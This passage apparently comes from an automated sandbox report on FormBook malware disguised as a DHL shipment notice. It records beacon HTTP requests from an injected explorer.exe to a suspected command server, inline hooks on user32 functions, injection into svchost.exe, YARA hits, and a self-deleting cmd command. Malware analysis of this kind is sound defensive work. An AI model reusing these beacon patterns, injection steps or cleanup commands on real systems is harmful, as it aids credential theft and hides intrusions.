                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.4497773.64.163.5080C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      May 13, 2022 16:11:20.088871002 CEST11599OUTGET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1
                      Host: www.ultrakill.xyz
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      May 13, 2022 16:11:20.108275890 CEST11600INHTTP/1.1 410 Gone
                      Server: openresty
                      Date: Fri, 13 May 2022 14:11:20 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 75 6c 74 72 61 6b 69 6c 6c 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='0; url=http://www.ultrakill.xyz/' />a </head>8</html>0


                      Code Manipulations

                      User Modules

                      Hook Summary

                      Function NameHook TypeActive in Processes
                      PeekMessageAINLINEexplorer.exe
                      PeekMessageWINLINEexplorer.exe
                      GetMessageWINLINEexplorer.exe
                      GetMessageAINLINEexplorer.exe

                      Processes

                      Process: explorer.exe, Module: user32.dll
                      Function NameHook TypeNew Data
                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE6
                      PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE6
                      GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE6
                      GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE6

                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:16:09:19
                      Start date:13/05/2022
                      Path:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe"
                      Imagebase:0x400000
                      File size:278331 bytes
                      MD5 hash:8FBDF9F70B21179D87B83FE47B2137DD
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Target ID:1
                      Start time:16:09:21
                      Start date:13/05/2022
                      Path:C:\Users\user\AppData\Local\Temp\aeokw.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                      Imagebase:0xd70000
                      File size:80384 bytes
                      MD5 hash:6F70881E0183CE9F78E300CF2C8DC48E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      General

                      Target ID:2
                      Start time:16:09:22
                      Start date:13/05/2022
                      Path:C:\Users\user\AppData\Local\Temp\aeokw.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                      Imagebase:0xd70000
                      File size:80384 bytes
                      MD5 hash:6F70881E0183CE9F78E300CF2C8DC48E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      General

                      Target ID:5
                      Start time:16:09:27
                      Start date:13/05/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6f3b00000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      General

                      Target ID:17
                      Start time:16:09:51
                      Start date:13/05/2022
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\svchost.exe
                      Imagebase:0x2f0000
                      File size:44520 bytes
                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      General

                      Target ID:19
                      Start time:16:09:56
                      Start date:13/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
                      Imagebase:0x1190000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:20
                      Start time:16:09:57
                      Start date:13/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff647620000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      No disassembly